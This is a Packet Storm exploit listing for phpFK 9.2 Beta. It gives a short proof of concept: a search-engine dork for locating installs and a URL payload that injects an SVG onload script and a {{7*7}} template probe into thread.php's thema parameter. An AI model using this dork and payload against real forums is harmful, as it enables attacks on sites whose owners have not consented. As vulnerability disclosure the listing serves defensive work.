Security
Headlines
HeadlinesLatestCVEs

Headline

phpFK 9.2 Beta Cross Site Scripting / SQL Injection

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

Packet Storm
#sql#xss#csrf#vulnerability#web#ios#mac#windows#apple#google#ubuntu#linux#debian#cisco#java#php#perl#auth#ruby#firefox

phpFK 9.2 Beta Cross Site Scripting / SQL Injection

phpFK 9.2 Beta Cross Site Scripting / SQL Injection

Posted Jul 2, 2023

Authored by indoushka

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection

SHA-256 | 09fef1efe957f866ce2e4d01724c95e85523e37eb341c2135635c17435c8b42c

Download | Favorite | View

phpFK 9.2 Beta Cross Site Scripting / SQL Injection

====================================================================================================================================| # Title     : phpFK v9.2 Beta version SQLi + XSS Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0.(32-bit)                                              | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

File Tags

  • ActiveX (932)
  • Advisory (81,554)
  • Arbitrary (16,117)
  • BBS (2,859)
  • Bypass (1,725)
  • CGI (1,025)
  • Code Execution (7,203)
  • Conference (678)
  • Cracker (841)
  • CSRF (3,328)
  • DoS (23,288)
  • Encryption (2,363)
  • Exploit (51,405)
  • File Inclusion (4,202)
  • File Upload (960)
  • Firewall (821)
  • Info Disclosure (2,742)
  • Intrusion Detection (888)
  • Java (3,007)
  • JavaScript (845)
  • Kernel (6,610)
  • Local (14,412)
  • Magazine (586)
  • Overflow (12,627)
  • Perl (1,423)
  • PHP (5,134)
  • Proof of Concept (2,336)
  • Protocol (3,571)
  • Python (1,526)
  • Remote (30,582)
  • Root (3,573)
  • Rootkit (506)
  • Ruby (611)
  • Scanner (1,633)
  • Security Tool (7,861)
  • Shell (3,168)
  • Shellcode (1,212)
  • Sniffer (893)
  • Spoof (2,193)
  • SQL Injection (16,254)
  • TCP (2,395)
  • Trojan (687)
  • UDP (885)
  • Virus (664)
  • Vulnerability (31,654)
  • Web (9,600)
  • Whitepaper (3,747)
  • x86 (961)
  • XSS (17,787)
  • Other

File Archives

  • July 2023
  • June 2023
  • May 2023
  • April 2023
  • March 2023
  • February 2023
  • January 2023
  • December 2022
  • November 2022
  • October 2022
  • September 2022
  • August 2022
  • Older

Systems

  • AIX (428)
  • Apple (1,981)
  • BSD (373)
  • CentOS (57)
  • Cisco (1,921)
  • Debian (6,782)
  • Fedora (1,691)
  • FreeBSD (1,244)
  • Gentoo (4,321)
  • HPUX (879)
  • iOS (346)
  • iPhone (108)
  • IRIX (220)
  • Juniper (67)
  • Linux (46,065)
  • Mac OS X (685)
  • Mandriva (3,105)
  • NetBSD (256)
  • OpenBSD (483)
  • RedHat (13,489)
  • Slackware (941)
  • Solaris (1,610)
  • SUSE (1,444)
  • Ubuntu (8,707)
  • UNIX (9,256)
  • UnixWare (186)
  • Windows (6,560)
  • Other

Packet Storm: Latest News

ABB Cylon Aspect 3.07.02 user.properties Default Credentials